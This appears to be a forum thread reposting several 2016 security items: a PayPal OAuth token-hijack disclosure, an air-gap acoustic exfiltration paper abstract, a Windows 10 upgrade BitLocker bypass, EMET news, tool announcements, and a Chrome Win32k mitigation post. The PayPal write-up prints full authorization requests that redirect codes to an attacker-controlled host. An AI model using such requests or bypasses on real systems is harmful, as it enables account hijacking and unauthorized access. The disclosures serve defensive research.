  17. Monday, 28 November 2016 All your Paypal OAuth tokens belong to me - localhost for the win tl;dr I was able to hijack the OAuth tokens of EVERY Paypal OAuth application with a really simple trick. Introduction If you have been following this blog you might have got tired of how many times I have stressed out the importance of the redirect_uri parameter in the OAuth flow. This simple parameter might be source of many headaches for any maintainer of OAuth installations being it a client or a server. Accepting the risk of repeating myself here is two simple suggestions that may help you stay away from troubles (you can always skip this part and going directly to the Paypal Vulnerability section): If you are building an OAuth client, Thou shall register a redirect_uri as much as specific as you can i.e. if your OAuth client callback is https://yourouauthclient.com/oauth/oauthprovider/callback then DO register https://yourouauthclient.com/oauth/oauthprovider/callback NOT JUST https://yourouauthclient.com/ or https://yourouauthclient.com/oauth If you are still not convinced here is how I hacked Google leveraging this mistake. Second suggestion is The ONLY safe validation method for redirect_uri the authorization server should adopt is exact matching Although other methods offer client developers desirable flexibility in managing their application’s deployment, they are exploitable. From “OAuth 2 In Action” by Justin Richer and Antonio Sanso, Copyrights 2016 Again here you can find examples of providers that were vulnerable to this attack Egor Homakov hacking Github me/myself hacking Facebook bypassing the regex redirect_uri validation Paypal Vulnerability So after this long premise the legitimate question is what was wrong with Paypal ? Basically like many online internet services Paypal offers the option to register your own Paypal application via a Dashboard. So far so good :). The better news (for Paypal) is that they actually employs an exact matching policy for redirect_uri So what was wrong ? While testing my own OAuth client I have noticed something a bit fishy. The easier way to describe it is using an OAuth application from Paypal itself (remember the vulnerability I found is universal aka worked with every client!). Basically Paypal has setup a Demo Paypal application to showcases their OAuth functionalities. The initial OAuth request looked like: https://www.paypal.com/signin/authorize?client_id=AdcKahCXxhLAuoIeOotpvizsVOX5k2A0VZGHxZnQHoo1Ap9ChOV0XqPdZXQt&response_type=code&scope=openid profile email address phone https://uri.paypal.com/services/paypalattributes https://uri.paypal.com/services/paypalattributes/business https://uri.paypal.com/services/expresscheckout&redirect_uri=https://demo.paypal.com/loginsuccessful&nonce=&newUI=Y As you can see the registered redirect_uri for this application is https://demo.paypal.com/loginsuccessful What I have found out is that the Paypal Authorization Server was also accepting localhost as redirect_uri. So https://www.paypal.com/signin/authorize?client_id=AdcKahCXxhLAuoIeOotpvizsVOX5k2A0VZGHxZnQHoo1Ap9ChOV0XqPdZXQt&response_type=code&scope=openid profile email address phone https://uri.paypal.com/services/paypalattributes https://uri.paypal.com/services/paypalattributes/business https://uri.paypal.com/services/expresscheckout&redirect_uri=https://localhost&nonce=&newUI=Y was still a valid request and the authorization code was then delivered back to localhost . Cute right? But still not a vulnerability Well the next natural step was to create a DNS entry for my website looking lke http://localhost.intothesymmetry.com/ and try: https://www.paypal.com/signin/authorize?client_id=AdcKahCXxhLAuoIeOotpvizsVOX5k2A0VZGHxZnQHoo1Ap9ChOV0XqPdZXQt&response_type=code&scope=openid profile email address phone https://uri.paypal.com/services/paypalattributes https://uri.paypal.com/services/paypalattributes/business https://uri.paypal.com/services/expresscheckout&redirect_uri=http://localhost.intothesymmetry.com/&nonce=&newUI=Y and you know what? BINGO : So it really looks like that even if Paypal did actually performed exact matching validation, localhost was a magic word and it override the validation completely!!! Worth repeating is this vulnerability worked for any Paypal OAuth client hence was Universal making my initial claim All your Paypal tokens belong to me - localhost for the win not so crazy anymore. For more follow me on Twitter. Disclosure timeline 08-09-2016 - Reported to Paypal security team. 26-09-2016 - Paypal replied this is not a vulnerability!! 26-09-2016 - I replied to Paypal saying ok no problem. Are you sure you do not want to give an extra look into it ? 28-09-2016 - Paypal replied the will give another try. 07-11-2016 - Paypal fixed the issue (bounty awarded) 28 -11-2016 - Public disclosure. Acknowledgement I would like to thank the Paypal Security team for the constant and quick support. Posted by Antonio Sanso at 02:00 Sursa: http://blog.intothesymmetry.com/2016/11/all-your-paypal-tokens-belong-to-me.html
  18. DiskFiltration: Data Exfiltration from Speakerless Air-Gapped Computers via Covert Hard Drive Noise Mordechai Guri, Yosef Solewicz, Andrey Daidakulov, Yuval Elovici (Submitted on 11 Aug 2016) Air-gapped computers are disconnected from the Internet physically and logically. This measure is taken in order to prevent the leakage of sensitive data from secured networks. In the past, it has been shown that malware can exfiltrate data from air-gapped computers by transmitting ultrasonic signals via the computer's speakers. However, such acoustic communication relies on the availability of speakers on a computer. In this paper, we present 'DiskFiltration,' a covert channel which facilitates the leakage of data from an air-gapped compute via acoustic signals emitted from its hard disk drive (HDD). Our method is unique in that, unlike other acoustic covert channels, it doesn't require the presence of speakers or audio hardware in the air-gapped computer. A malware installed on a compromised machine can generate acoustic emissions at specific audio frequencies by controlling the movements of the HDD's actuator arm. Digital Information can be modulated over the acoustic signals and then be picked up by a nearby receiver (e.g., smartphone, smartwatch, laptop, etc.). We examine the HDD anatomy and analyze its acoustical characteristics. We also present signal generation and detection, and data modulation and demodulation algorithms. Based on our proposed method, we developed a transmitter on a personal computer and a receiver on a smartphone, and we provide the design and implementation details. We also evaluate our covert channel on various types of internal and external HDDs in different computer chassis and at various distances. With DiskFiltration we were able to covertly transmit data (e.g., passwords, encryption keys, and keylogging data) between air-gapped computers to a smartphone at an effective bit rate of 180 bits/minute (10,800 bits/hour) and a distance of up to two meters (six feet). Subjects: Cryptography and Security (cs.CR) Cite as: arXiv:1608.03431 [cs.CR] (or arXiv:1608.03431v1 [cs.CR] for this version) Submission history From: Mordechai Guri [view email] [v1] Thu, 11 Aug 2016 12:06:12 GMT (3304kb) Sursa: https://arxiv.org/abs/1608.03431
  19. Monday, November 28, 2016 Every Windows 10 in-place Upgrade is a SEVERE Security risk This is a big issue and it has been there for a long time. Just a month ago I finally got verification that the Microsoft Product Groups not only know about this but that they have begun working on a fix. As I want to be known as a white hat I had to wait for this to happen before I blog this. There is a small but CRAZY bug in the way the "Feature Update" (previously known as "Upgrade") is installed. The installation of a new build is done by reimaging the machine and the image installed by a small version of Windows called Windows PE (Preinstallation Environment). This has a feature for troubleshooting that allows you to press SHIFT+F10 to get a Command Prompt. This sadly allows for access to the hard disk as during the upgrade Microsoft disables BitLocker. I demonstrate this in the following video. This would take place when you take the following update paths: Windows 10 RTM --> 1511 or 1607 release (November Update or Anniversary Update) Any build to a newer Insider Build (up to end of October 2016 at least) The real issue here is the Elevation of Privilege that takes a non-admin to SYSTEM (the root of Windows) even on a BitLocker (Microsoft's hard disk encryption) protected machine. And of course that this doesn't require any external hardware or additional software. It's just a crazy bug I would say Here's the video: Why would a bad guy do this: An internal threat who wants to get admin access just has to wait for the next upgrade or convince it's OK for him to be an insider An external threat having access to a computer waits for it to start an upgrade to get into the system I sadly can't offer solutions better than: Don't allow unattended upgrades Keep very tight watch on the Insiders Stick to LTSB version of Windows 10 for now I am known to share how I do things myself and I'm happy to say I have instructed my customers to stay on the Long Time Servicing Branch for now. At least they can wait until this is fixed and move to a more current branch then. I meet people all the time who say that LTSB is a legacy way but when I say I'm going to wait a year or two to get the worst bugs out of this new "Just upgrade" model - this is what I meant… Posted by Sami Laiho at 6:14 PM Sursa: http://blog.win-fu.com/2016/11/every-windows-10-in-place-upgrade-is.html
      • 1
      • Upvote
  20. By Fahmida Y. Rashid Senior Writer CERT to Microsoft: Keep EMET alive Windows systems with Enhanced Mitigation Experience Toolkit properly configured is more secure than a standalone Windows 10 system, says CERT InfoWorld | Nov 29, 2016 Credit: Thinkstock Microsoft wants to stop supporting its Enhanced Mitigation Experience Toolkit (EMET) because all of the security features have been baked into Windows 10. A vulnerability analyst says Windows with EMET offers additional protection not available in standalone Windows 10. "Even a Windows 7 system with EMET configured protects your application more than a stock Windows 10 system," said Will Dormann, a vulnerability analyst with the Computer Emergency Response Team(CERT) at Carnegie Mellon University’s Software Engineering Institute. [ InfoWorld's deep look: Why (and how) you should manage Windows 10 PCs like iPhones. | The essentials for Windows 10 installation: Download the Windows 10 Installation Superguide today. ] Originally introduced in 2009, EMET adds exploit mitigations, including address space layout randomization (ASLR) and data execution prevention (DEP), to Windows systems to make it harder for malware to trigger unpatched vulnerabilities. Since Windows 10 includes EMET’s anti-exploit protections by default, Microsoft is planning to end-of-life the free tool in July 2018. CERT’s Dormann said Microsoft should keep supporting the toolkit because Windows 10 does not provide all of the application-specific mitigations available in EMET. “Windows 10 does indeed provide some nice exploit mitigations. The problem is that the software you are running needs to be specifically compiled to take advantage of them,” Dormann said. OS-level vs application-level defenses Dormann argues that Microsoft should keep supporting the toolkit -- currently EMET 5.51 -- because it provides both systemwide protection and application-specific mitigations that make the toolkit relevant for Windows security, even on Windows 10 systems. EMET’s systemwide protections include the aforementioned ASLR and DEP, Structured Exception Handler Overwrite Protection (SEHOP), Certificate Trust (Pinning), and Block Untrusted Fonts. EMET’s application-specific protections include DEP, SEHOP, ASLR, Null Page Allocation, Heapspray Allocations, Export Address Table Access Filtering (EAF), Export Address Table Access Filtering Plus (EAF+), Bottom-up Randomization (BottomUP ASLR), Attack Surface Reduction (ASR), Block Untrusted Fonts, and Return-Oriented Programming mitigations. Microsoft’s principal lead program for OS security, Jeffrey Sutherland, recently said that users should upgrade to Windows 10 since the latest operating system natively includes the security features provided by EMET. That is true to some extent, as DEP, SEHOP, ASLR, BottomupASLR, and ROP mitigation (as Control Flow Guard) are part of Windows 10, but many of the application-specific mitigations are not. What Sutherland neglected to consider was that most Windows administrators rely on EMET to apply all of the available exploit mitigations to applications. Consider that a Windows 10 system with EMET properly configured has 13 additional mitigations -- the application-specific controls -- than a standalone Windows 10 system. "It is pretty clear that an application running on a stock Windows 10 system does not have the same protections as one running on a Windows 10 system with EMET properly configured," Dormann said. Application defenses still lagging Windows 10 may be the most secure Windows ever, but the applications have to be compiled to utilize the exploit mitigation features to actually benefit from those enhanced security features. For example, if the application isn’t designed to use Control Flow Guard, then the application doesn’t benefit from Return-Oriented Programming (ROP) defenses, despite the fact that Control Flow Guard is part of Windows 10. "Out of all of the applications you run in your enterprise, do you know which ones are built with Control Flow Guard support? If an application is not built to use Control Flow Guard, it doesn't matter if your underlying operating system supports it or not," Dormann said. The problem isn’t limited to third-party and custom enterprise applications, as there are older -- but still widely used -- Microsoft applications that don’t access the advanced exploit mitigations. For example, Microsoft does not compile all of Office 2010 with the /DYNAMICBASE flag to indicate compatibility with ASLR. An attacker could potentially bypass ASLR and exploit a memory corruption vulnerability by loading a malicious library into the vulnerable application’s process space. Ironically, administrators would protect the application from being targeted in this way by running EMET with application-specific mitigations. "Because we cannot rely on all software vendors to produce code that uses all the exploit mitigations available, EMET puts this control back in our hands," Dormann said. Don’t pick sides; do both Microsoft says to start migrating to Windows 10 and stop using EMET by 2018. A senior engineer at CERT, tasked by the United States Department of Homeland Security to make security recommendations of national significance, says EMET still offers better security than standalone Windows 10. What is a Windows administrator to do? The answer, according to Dormann, is to follow both recommendations: Upgrade to Windows 10 to take advantage of native exploit mitigation features, and install EMET to apply application-specific mitigations. EMET will continue to keep working even after its end-of-life date, which means administrators can still use the tool to protect unsupported software against possible zero-day vulnerabilities. Several other Microsoft applications are nearing their end-of-life dates, including Microsoft Office 2007. Administrators can continue to use EMET to protect these applications from attacks looking for zero-day vulnerabilities. “With such out-of-support applications, it is even more important to provide additional exploit protection with a product like EMET,” Dormann said. It’s possible that with Microsoft’s new Windows-as-a-service model, the remaining EMET defenses will be added to Windows 10 before the end-of-life date, at which point Windows 10 would be able to handle the application-specific protections without EMET. Until then, EMET is “still an important tool to help prevent exploitation of vulnerabilities,” Dormann said. To comment on this article and other InfoWorld content, visit InfoWorld's LinkedIn page, Facebook page and Twitter stream. Sursa: http://www.infoworld.com/article/3145565/security/cert-to-microsoft-keep-emet-alive.html#tk.rss_security
      • 1
      • Upvote
  21. Fldbg, a Pykd script to debug FlashPlayer November 29, 2016Exploit Development, Offensive Security A few months ago, we decided to make a new module for our Advanced Windows Exploitation class. After evaluating a few options we chose to work with an Adobe Flash 1day vulnerability originally discovered by the Google Project Zero team. Since we did not have any previous experience with Flash internals, we expected a pretty steep learning curve. We started by trying to debug the Flash plugin on Firefox while running the proof-of-concept (PoC) file and quickly realized that debugging the player can be rather time consuming without appropriate tools due to multiple reasons. First of all, the FlashPlayerPlugin.exe process is spawned by Firefox through the help of an auxiliary process named plugin-container.exe. The latter facilitates communication between the Flash plugin process and the Firefox browser process. Additionally, if protected mode is enabled (default behavior), the FlashPlayerPlugin.exe acts as a broker process and loads a second instance of the player in a sandboxed environment. This sandboxed instance is responsible for parsing and rendering of Flash content. Most of the functions responsible for rendering of Flash content, including the code exploited in our PoC, are wrapped in the NPSWF32_X_X_X_X dynamic library (DLL), which is loaded by FlashPlayerPlugin.exe. As a result, to successfully debug our process, we need to explicitly inform the debugger that we want it to debug processes spawned by Firefox. Furthermore, in order to set breakpoints on NPSWF32 functions, we need to intercept the second instance of the FlashPlayerPlugin is loaded (sandboxed process), which is the one that loads our target DLL. All of these preliminary tasks could easily be automated directly from WinDgb. However, since we realized that we would need to automate other functionality as well, we decided to start writing a pykd script that would facilitate debugging the Flash player on Firefox in a less painful way. One of the problems you encounter when working with the Flash player is the ability to dynamically analyze the ActionScript client code by setting appropriate breakpoints. The ActionScript 3 architecture runs on the ActionScript Virtual Machine 2 (AVM2) engine and computation in the AVM2 is based on executing the code of a “method body”. As explained in Haifei Li paper “Inside AVM”, a method can be identified from its MethodInfo class as: Native – a function in the Flash .text section “Normal” – our own code in the AS3 source converted to native code through the Just-In-Time (JIT) compiler Static init – executed in interpreter mode. Since there are no symbols exported for native functions and AS3 client code is dynamically translated into processor-specific instructions at runtime, tracing the execution flow can be quite challenging. We decided to take an approach similar to the one exposed in “Discover Flash Player Zero-day Attacks In The Wild From Big Data”, where we hook specific functions in the NPSWF32 library to be able to resolve native and jitted methods. Specifically we hook BaseExecMgr::setJit and BaseExecMgr::setNative which we dynamically identify in NPSWF32 by comparing their opcode signatures with the ones found in the compiled avmplus code. Articol complet: https://www.offensive-security.com/vulndev/fldbg-a-pykd-script-to-debug-flashplayer/
  22. InsecureBankv2 – Vulnerable Android Application Information security awareness training may include several demo that describe how attacker may exploit vulnerabilities on system to gain full control on remote devices. If you are looking to demonstrate android application you can use InsecureBankv2. This tool was updated during the BlackHat arsenal and is available for users online, the purpose of this project is to provide security enthusiasts and developers a way to learn the Android insecurities by testing this vulnerable application. The list of vulnerabilities that are currently included in this release are: Flawed broadcast receivers Weak authorization mechanism Root detection and bypass Local encryption issues Vulnerable activity components Insecure content provider access Insecure webview implementation Weak cryptography implementation Application patching Sensitive information in memory You can read more and download the tool over here: https://github.com/dineshshetty/ Sursa: http://www.sectechno.com/insecurebankv2-vulnerable-android-application/
  23. Cosa Nostra Cosa Nostra is an open source software clustering toolkit with a focus on malware analysis. It can create phylogenetic trees of binary malware samples that are structurally similar. It was initially released during SyScan360 Shanghai (2016). Getting started Required 3rd party tools In order to use Cosa Nostra you will need the source code, of course, a 2.7 version of Python, as well as one of the following tools in order to perform code analysis: Pyew Written in Python, it supports analysis of PE, ELF, Bios and Boot files for x86 or x86_64. IDA Written in C++. It supports analysing a plethora of executable types that you probably never even heard about. Commercial product. Radare2 Written in pure C. Same as with IDA, with support for extremely rare CPUs and binary formats. Also, it's open source! Link: https://github.com/joxeankoret/cosa-nostra
      • 2
      • Upvote
  24. NEUTRALIZING INTEL’S MANAGEMENT ENGINE by: Brian Benchoff November 28, 2016 Five or so years ago, Intel rolled out something horrible. Intel’s Management Engine (ME) is a completely separate computing environment running on Intel chipsets that has access to everything. The ME has network access, access to the host operating system, memory, and cryptography engine. The ME can be used remotely even if the PC is powered off. If that sounds scary, it gets even worse: no one knows what the ME is doing, and we can’t even look at the code. When — not ‘if’ — the ME is finally cracked open, every computer running on a recent Intel chip will have a huge security and privacy issue. Intel’s Management Engine is the single most dangerous piece of computer hardware ever created. Researchers are continuing work on deciphering the inner workings of the ME, and we sincerely hope this Pandora’s Box remains closed. Until then, there’s now a new way to disable Intel’s Management Engine. Previously, the first iteration of the ME found in GM45 chipsets could be removed. This technique was due to the fact the ME was located on a chip separate from the northbridge. For Core i3/i5/i7 processors, the ME is integrated to the northbridge. Until now, efforts to disable an ME this closely coupled to the CPU have failed. Completely removing the ME from these systems is impossible, however disabling parts of the ME are not. There is one caveat: if the ME’s boot ROM (stored in an SPI Flash) does not find a valid Intel signature, the PC will shut down after 30 minutes. A few months ago, [Trammell Hudson] discovered erasing the first page of the ME region did not shut down his Thinkpad after 30 minutes. This led [Nicola Corna] and [Frederico Amedeo Izzo] to write a script that uses this exploit. Effectively, ME still thinks it’s running, but it doesn’t actually do anything. With a BeagleBone, an SOIC-8 chip clip, and a few breakout wires, this script will run and effectively disable the ME. This exploit has only been confirmed to work on Sandy Bridge and Ivy Bridge processors. It should work on Skylake processors, and Haswell and Broadwell are untested. Separating or disabling the ME from the CPU has been a major focus of the libreboot and coreboot communities. The inability to do so has, until now, made the future prospects of truly free computing platforms grim. The ME is in everything, and CPUs without an ME are getting old. Even though we don’t have the ability to remove the ME, disabling it is the next best thing. Sursa: https://hackaday.com/2016/11/28/neutralizing-intels-management-engine/
      • 1
      • Upvote
  25. Tuesday, November 29, 2016 Breaking the Chain Posted by James Forshaw, Wielder of Bolt Cutters. Much as we’d like it to be true, it seems undeniable that we’ll never fix all security bugs just by looking for them. One of most productive ways to dealing with this fact is to implement exploit mitigations. Project Zero considers mitigation work just as important as finding vulnerabilities. Sometimes we can get our hands dirty, such as helping out Adobe and Microsoft in Flash mitigations. Sometimes we can only help indirectly via publishing our research and giving vendors an incentive to add their own mitigations. This blog post is about an important exploit mitigation I developed for Chrome on Windows. It will detail many of the challenges I faced when trying to get this mitigation released to protect end-users of Chrome. It’s recently shipped to users of Chrome on Windows 10 (in M54), and ended up blocking the sandbox escape of an exploit chain being used in the wild. For information on the Chromium bug that contains the list of things we implemented in order to get this mitigation working, look here. The Problem with Win32k It’s possible to lockdown a sandbox such as Chrome’s pretty comprehensively using Restricted Tokens. However one of the big problems on Windows is locking down access to system calls. On Windows you have both the normal NT system calls and Win32k system calls for accessing the GUI which combined represents a significant attack surface. While the NT system calls do have exploitable vulnerabilities now and again (for example issue 865) it’s nothing compared to Win32k. From just one research project alone 31 issues were discovered, and this isn’t counting the many font issues Mateusz has found and the hundreds of other issues found by other researchers. Much of Win32k’s problems come from history. In the first versions of Windows NT almost all the code responsible for the windowing system existed in user-mode. Unfortunately for 90’s era computers this wasn’t exactly good for performance so for NT 4 Microsoft moved a significant portion of what was user-mode code into the kernel (becoming the driver, win32k.sys). This was a time before Slammer, before Blaster, before the infamous Trustworthy Computing Memo which focussed Microsoft to think about security first. Perhaps some lone voice spoke for security that day, but was overwhelmed by performance considerations. We’ll never know for sure, however what it did do was make Win32k a large fragile mess which seems to have persisted to this day. And the attack surface this large fragile mess exposed could not be removed from any sandboxed process. That all changed with the release of Windows 8. Microsoft introduced the System Call Disable Policy, which allows a developer to completely block access to the Win32k system call table. While it doesn’t do anything for normal system calls the fact that you could eliminate over a thousand win32k system calls, many of which have had serious security issues, would be a crucial reduction in the attack surface. However no application in a default Windows installation used this policy (it’s said to have been introduced for non-GUI applications such as on Azure) and using it for something as complex as Chrome wasn’t going to be easy. The process of shipping Win32k lockdown required a number of architectural changes to be made to Chrome. This included replacing the GDI-based font code with Microsoft’s DirectWrite library. After around two years of effort Win32k lockdown was shipping by default. The Problems with Flash in Chrome Chrome uses a multi-process model, in which web page content is parsed inside Renderer processes, which are covered by the Win32k Lockdown policy for the Chrome sandbox. Plugins such as Flash and PDFium load into a different type of process, a PPAPI process, and due to circumstance these could not have the lockdown policy enabled. This would seem a pretty large weak point. Flash has not had the best security track record (relevant), making the likelihood of Flash being an RCE vector very high. Combine that with the relative ease of finding and exploiting Win32k vulnerabilities and you’ve got a perfect storm. It would seem reasonable to assume that real attackers are finding Win32k vulnerabilities and using them to break out of restrictive sandboxes including Chrome’s using Flash as the RCE vector. The question was whether that was true. The first real confirmation that this was true came from the Hacking Team breach, which occurred in July 2015. In the dumped files was an unfixed Chrome exploit which used Flash as the RCE vector and a Win32k exploit to escape the sandbox. While both vulnerabilities were quickly fixed I came upon the idea that perhaps I could spend some time to implement the lockdown policy for PPAPI and eliminate this entire attack chain. Analysing the Problem The first thing I needed to do was to determine what Win32k APIs were used by a plugin such as Flash. There are actually 3 main system DLLs that can be called by an application which end up issuing system calls to Win32k: USER32, GDI32 and IMM32. Each has slightly different responsibilities. The aim would be to enumerate all calls to these DLLs and replace them with APIs which didn’t rely on Win32k. Still it wasn’t just Flash that might call Win32k API but also the Pepper APIs implemented in Chrome. I decided to take two approaches to finding out what code I needed to remove, import inspection and dynamic analysis. Import inspection is fairly simple, I just dumped any imports for the plugins such as the Pepper Flash plugin DLL and identified anything which came from the core windowing DLLs. I then ran Flash and PDFium with a number of different files to try and exercise the code paths which used Win32k system calls. I attached WinDBG to the process and set breakpoints on all functions starting with NtUser and NtGdi which I could find. These are the system call stubs used to call Win32k from the various DLLs. This allowed me to catch functions which were in the PPAPI layer or not directly imported. Win32k system call using code in Flash and PDFium was almost entirely to enumerate font information, either directly or via the PPAPI. There was some OpenSSL code in Flash which uses the desktop window as a source of entropy, but as this could never work in the Chrome sandbox it’s clear that this was vestigial (or Flash’s SSL random number generator is broken, chose one or the other). Getting rid of the font enumeration code used through PPAPI was easy. Chrome already supported replacing GDI based font rendering and enumeration with DirectWrite which does all the rendering in User Mode. Most of the actual rendering in Flash and PDFium is done using their own TrueType font implementations (such as FreeType). Enabling DirectWrite for PPAPI processes was implemented in a number of stages, with the final enabling of DirectWrite in this commit. Now I just needed to get rid of the GDI font code in Flash and PDFium itself. For PDFium I was able to repurpose existing font code used for Linux and macOS. After much testing to ensure the font rendering didn’t regress from GDI I was able to put the patch into PDFium. Now the only problem was Flash. As a prototype I implemented shims for all the font APIs used by Flash and emulated them using DirectWrite. For a better, more robust solution I needed to get changes made to Flash. I don’t have access to the Flash source code, however Google does have a good working relationship with Adobe and I used this to get the necessary changes implemented. It turned out that there was a Pepper API which did all that was needed to replace the GDI font handling, pp::flash::FontFile. Unfortunately that was only implemented on Linux, however I was able to put together a proof-of-concept Windows implementation of pp::flash::FontFile and through Xing Zhang of Adobe we got a full implementation in Chrome and Flash. Doomed Rights Management From this point I could enable Win32k lockdown for plugins and after much testing everything seemed to be working, until I tried to test some DRM protected video. While encrypted video worked, any Flash video file which required output protection (such as High-bandwidth Digital Content Protection (HDCP)) would not. HDCP works by encrypting the video data between the graphics output and the display, designed to prevent people capturing a digital video. Still this presents a problem, as video along with games are some of the only residual uses of Flash. In testing, this also affected the Widevine plugin that implements the Encrypted Media Extensions for Chrome. Widevine uses PPAPI under the hood; not fixing this issue would break all HD content playback. Enabling HDCP on Windows requires the use of a small number of Win32k APIs. I’d not discovered this during my initial analysis because, a) I didn’t run any protected content through the Flash player and all functions were imported at runtime using LoadLibrary and GetProcAddress only when needed. The function Flash was accessing was OPMGetVideoOutputsFromHMONITOR which is exposed by dxva2.dll. This function in turn maps down to multiple Win32k calls such as NtGdiCreateOPMProtectedOutputs. The ideal way of fixing this would be to implement a new API in Chrome which exposed enabling HDCP then get Adobe and Widevine to use that implementation. It turns out that the Adobe DRM and Widevine teams are under greater constraints than normal development teams. After discussion with my original contact at Adobe they didn’t have access to the DRM code for Flash. I was able to have meetings with Widevine (they’re part of Google) and the Adobe DRM team but in the end I decided to go it alone and implement redirection of these APIs as part of the sandbox code. Fortunately this doesn’t compromise the security guarantees of the original API because of the way Microsoft designed it. To prevent a MitM attack against the API calls (i.e. you hook the API and return the answer the caller expects, such as HDCP is enabled) the call is secured between the caller and graphics driver using a X.509 certificate chain returned during initialization. Once the application such as Flash verifies this certificate chain is valid it will send back a session key to the graphics driver encrypted using the end certificate’s public key. The driver then decrypts the session key and all communication from then on is encrypted and hashed using variants of this key. Of course this means that the driver must contain the private key corresponding to the public key in the end certificate, though at least in the case on my workstation that shouldn’t be a major issue as the end certificate has a special Key Usage OID (1.3.6.1.4.1.311.10.5.8) and the root “Microsoft Digital Media Authority” certificate isn’t in the trusted certificate store so the chain wouldn’t be trusted anyway. Users of the API can embed the root certificate directly in their code and verify its trust before continuing. As the APIs assume that it’s already been brokered (at minimum via Win32k.sys) then adding another broker, in this case one which brokers from the PPAPI process to another process in Chrome without the Win32k lockdown policy in place, doesn’t affect the security guarantees of the API. Of course I made best efforts to verify the data being brokered to limit the potential attack surface, though I’ll admit something about sending binary blobs to a graphics driver gives me the chills. This solved the issue with enabling output protection for DRM’ed content and finally the mitigation could be enabled by default. The commit for this code can be found here. Avoiding #yolosec Implementation wise it turned out to be not too complex once I’d found all the different possible places that Win32k functions could be called. Much of the groundwork was already in place with the original Win32k Renderer lockdown, the implementation of DirectWrite and the way the Pepper APIs were structured. So ship it already! Well not so fast, this is where reality kicks in. Chrome on Windows is relied upon by millions upon millions of users worldwide and Win32k lockdown for PPAPI would affect not only Flash, but PDFium (which is used in things like the Print Preview window) and Widevine. It’s imperative that this code is tested in the real world but in such a way that the impact on stability and functionality can be measured. Chrome supports something called Variations which allow developers to selectively enable experimental features remotely and deploy them to a randomly selected group of users who’ve opted into returning usage and crash statistics to Google. For example you can do a simple A/B test with one proportion of the Chrome users left as a Control and another with Win32k lockdown enabled. Statistical analysis can be performed on the results of that test based on various metrics, such as number of crashes, hanging processes and startup performance to detect anomalous behaviour which is due to the experimental code. To avoid impacting users of Stable this is typically only done on Beta, Dev and Canary users. Having these early release versions of Chrome are really important for ensuring features work as expected and we appreciate anyone who takes the time to run them. In the end this process of testing took longer than the implementation. Issues were discovered and fixed, stability measured until finally we were ready to ship. Unfortunately in that process there was a noticeable stability issue on Windows 8.1 and below which we couldn’t track down. The stability issues are likely down to interactions with third party code (such as AV) which inject their own code into Chrome processes. If this injected code relies on calling Win32k APIs for anything there’s a high chance of this causing a crash. This stability issue led to the hard decision to initially only allow the PPAPI Win32k lockdown to run on Windows 10 (where if anything stability improved). I hope to revisit this decision in the future. As third party code is likely to be updated to support the now shipping Windows 10 lockdown it might improve stability on Windows 8/8.1. As of M54 of Chrome, Win32k lockdown is enabled by default for users on Windows 10 (with an option to disable it remotely in the unlikely event a problem surfaces). As of M56 (set for release approximately the end of January 2017) it can only be disabled with a command line switch to disable all Win32k lockdown including Renderer processes. Wrap Up From the first patch submitted in September 2015 to the final patch in June it took almost 10 months of effort to come up with a shipping mitigation. The fact that it’s had its first public success (and who knows how many non-public ones) shows that it was worth implementing this mitigation. In the latest version of Windows 10, Anniversary Edition, Microsoft have implemented a Win32k filter which makes it easier to reduce the attack surface without completely disabling all the system calls which might have sped up development. Microsoft are also taking pro-active effort to improve the Win32k code base. The Win32k filter is already used in Edge, however at the moment only Microsoft can use it as the executable signature is checked before allowing the filter to be enabled. Also it’s not clear that the filter even completely blocked the vulnerability in the recent in-the-wild exploit chain. Microsoft would only state it would “stop all observed in-the-wild instances of this exploit”. Nuking the Win32k system calls from orbit is the only way to be sure that an attacker can’t find a bug which passes through the filter. Hopefully this blog post demonstrates the time and effort required to implement what seems on the face of it a fairly simple and clear mitigation policy for an application as complex as Chrome. We’ll continue to try and use the operating system provided sandboxing mechanisms to make all users on Chrome more secure. Thanks While I took on a large proportion of the technical work it’s clear this mitigation could not have shipped without the help of others in Chrome and outside. I’d like to especially mention the following: Anantanarayanan Lyengar, for landing the original Win32k mitigations for the Renderer processes on which all this is based. Will Harris, for dealing with variations and crash reporting to ensure everything was stable. Adobe Security Team and Xing Zhang for helping to remove GDI font code from Flash. The Widevine team for advice on DRM issues. Sursa: https://googleprojectzero.blogspot.ro/2016/11/breaking-chain.html
×
×
  • Create New...